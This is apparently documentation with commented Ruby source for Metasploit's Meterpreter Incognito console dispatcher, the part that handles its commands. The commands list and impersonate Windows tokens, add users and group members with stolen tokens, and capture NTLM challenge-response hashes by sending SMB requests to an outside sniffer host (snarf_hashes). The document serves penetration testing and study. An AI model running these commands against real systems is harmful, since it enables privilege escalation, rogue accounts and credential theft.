class Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Incognito
User interface for the Incognito extension: console commands for listing and impersonating tokens, used for privilege escalation.
Constants
- Klass
Public Class Methods
new(shell)
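Initializes an instance of the Incognito command dispatcher. (The source comment reads "priv command interaction", which appears to be carried over from the priv dispatcher.)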
Calls superclass method
Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::new
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 22
#
# Builds the dispatcher. All construction work is delegated to the
# superclass constructor; nothing Incognito-specific is set up here.
#
# @param shell the console shell object, handed unchanged to the superclass
def initialize(shell)
  super(shell)
end
Public Instance Methods
cmd_add_group_user(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 176
#
# Console handler for `add_group_user <groupname> <username> [options]`.
#
# Parses the "-h" option (target host), prints the usage text when fewer
# than two arguments were given, and otherwise forwards host, group name and
# user name to the Incognito extension and prints its output line by line.
#
# @param args [Array<String>] raw console arguments
# @return [true, nil] true after the request was sent, nil when only the
#   usage text was printed
def cmd_add_group_user(*args)
  # The target is the loopback address unless "-h" names another host.
  host = "127.0.0.1"

  @@add_group_user_opts.parse(args) do |opt, _idx, val|
    host = val if "-h" == opt
  end

  if args.size < 2
    print_line("Usage: add_group_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_group_user_opts.usage)
    return
  end

  # Only warns when the session is not SYSTEM; execution continues either way.
  system_privilege_check

  # NOTE(review): the positional values are read from args[0] and args[1]
  # and passed on without validation; the usage text places options last.
  groupname = args[0]
  username = args[1]

  response = client.incognito.incognito_add_group_user(host, groupname, username)
  response.each_line { |line| print(line) }

  true
end
cmd_add_localgroup_user(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 146
#
# Console handler for `add_localgroup_user <groupname> <username> [options]`.
#
# Parses the "-h" option (target host), prints the usage text when fewer
# than two arguments were given, and otherwise forwards host, group name and
# user name to the Incognito extension and prints its output line by line.
#
# @param args [Array<String>] raw console arguments
# @return [true, nil] true after the request was sent, nil when only the
#   usage text was printed
def cmd_add_localgroup_user(*args)
  # The target is the loopback address unless "-h" names another host.
  host = "127.0.0.1"

  @@add_localgroup_user_opts.parse(args) do |opt, _idx, val|
    host = val if "-h" == opt
  end

  if args.size < 2
    print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_localgroup_user_opts.usage)
    return
  end

  # Only warns when the session is not SYSTEM; execution continues either way.
  system_privilege_check

  # NOTE(review): the positional values are read from args[0] and args[1]
  # and passed on without validation; the usage text places options last.
  groupname = args[0]
  username = args[1]

  response = client.incognito.incognito_add_localgroup_user(host, groupname, username)
  response.each_line { |line| print(line) }

  true
end
cmd_add_user(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 116
#
# Console handler for `add_user <username> <password> [options]`.
#
# Parses the "-h" option (target host), prints the usage text when fewer
# than two arguments were given, and otherwise forwards host, user name and
# password to the Incognito extension and prints its output line by line.
#
# @param args [Array<String>] raw console arguments
# @return [true, nil] true after the request was sent, nil when only the
#   usage text was printed
def cmd_add_user(*args)
  # The target is the loopback address unless "-h" names another host.
  host = "127.0.0.1"

  @@add_user_opts.parse(args) do |opt, _idx, val|
    host = val if "-h" == opt
  end

  if args.size < 2
    print_line("Usage: add_user <username> <password> [options]\n")
    print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
    print_line(@@add_user_opts.usage)
    return
  end

  # Only warns when the session is not SYSTEM; execution continues either way.
  system_privilege_check

  # The password arrives as a plain console argument (args[1]) and is
  # forwarded as-is; nothing in this method masks or validates it.
  username = args[0]
  password = args[1]

  response = client.incognito.incognito_add_user(host, username, password)
  response.each_line { |line| print(line) }

  true
end
cmd_impersonate_token(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 98
#
# Console handler for `impersonate_token <token>`.
#
# Prints the usage text when no argument was given; otherwise passes the
# first argument to the Incognito extension and prints its output line by
# line.
#
# @param args [Array<String>] raw console arguments; only the first is used
# @return [true, nil] true after the request was sent, nil when only the
#   usage text was printed
def cmd_impersonate_token(*args)
  if args.empty?
    print_line("Usage: impersonate_token <token>\n")
    print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
    print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
    print_line("Hint: Enclose with quotation marks if name contains a space\n")
    return
  end

  # Only warns when the session is not SYSTEM; execution continues either way.
  system_privilege_check

  token_name = args.first
  response = client.incognito.incognito_impersonate_token(token_name)
  response.each_line { |line| print(line) }

  true
end
cmd_list_tokens(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 54
#
# Console handler for `list_tokens <list_order_option>`.
#
# "-u" selects order 0 and "-g" selects order 1; when neither option is
# present the usage text is printed. The extension's reply is read as a hash
# with 'delegation' and 'impersonation' entries, each printed line by line
# under its own heading.
#
# @param args [Array<String>] raw console arguments
# @return [true, nil] true after the listing was printed, nil when only the
#   usage text was printed
def cmd_list_tokens(*args)
  # -1 marks "no ordering option seen yet".
  token_order = -1

  @@list_tokens_opts.parse(args) do |opt, _idx, _val|
    if "-u" == opt
      token_order = 0
    elsif "-g" == opt
      token_order = 1
    end
  end

  if token_order == -1
    print_line("Usage: list_tokens <list_order_option>\n")
    print_line("Lists all accessible tokens and their privilege level")
    print_line(@@list_tokens_opts.usage)
    return
  end

  # Only warns when the session is not SYSTEM; execution continues either way.
  system_privilege_check

  tokens = client.incognito.incognito_list_tokens(token_order)

  print_line
  print_line("Delegation Tokens Available")
  print_line("========================================")
  tokens['delegation'].each_line { |line| print(line) }

  print_line
  print_line("Impersonation Tokens Available")
  print_line("========================================")
  tokens['impersonation'].each_line { |line| print(line) }

  print_line

  true
end
cmd_snarf_hashes(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 206
#
# Console handler for `snarf_hashes <sniffer_host>`.
#
# Prints the usage text when no argument was given; otherwise hands the
# first argument to the Incognito extension. The extension's return value is
# not printed; the operator is pointed at the sniffer's logs instead.
#
# @param args [Array<String>] raw console arguments; only the first is used
# @return [true, nil] true after the request was sent, nil when only the
#   usage text was printed
def cmd_snarf_hashes(*args)
  if args.empty?
    print_line("Usage: snarf_hashes <sniffer_host>\n")
    print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
    return
  end

  # Only warns when the session is not SYSTEM; execution continues either way.
  system_privilege_check

  sniffer_host = args[0]
  print_line("[*] Snarfing token hashes...")
  client.incognito.incognito_snarf_hashes(sniffer_host)
  print_line("[*] Done. Check sniffer logs")

  true
end
commands()
List of supported commands.
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 29
#
# Lists the console commands this dispatcher supports.
#
# @return [Hash{String => String}] command name mapped to its one-line
#   description, in the order the commands are declared here
def commands
  supported = {}
  supported["add_user"] = "Attempt to add a user with all tokens"
  supported["add_localgroup_user"] = "Attempt to add a user to a local group with all tokens"
  supported["add_group_user"] = "Attempt to add a user to a global group with all tokens"
  supported["list_tokens"] = "List tokens available under current user context"
  supported["impersonate_token"] = "Impersonate specified token"
  supported["snarf_hashes"] = "Snarf challenge/response hashes for every token"
  supported
end
name()
Name for this dispatcher
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 232
#
# Display name of this dispatcher.
#
# @return [String] always "Incognito"
def name
  'Incognito'
end
system_privilege_check()
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 222
#
# Prints a two-line warning when the session is not running as SYSTEM.
#
# This is advisory only: it neither raises nor returns a status that the
# callers in this file inspect, so the calling command proceeds regardless.
def system_privilege_check
  # Nothing to report when the session already runs as SYSTEM.
  return if client.sys.config.is_system?

  print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
  print_line(" Call rev2self if primary process token is SYSTEM")
end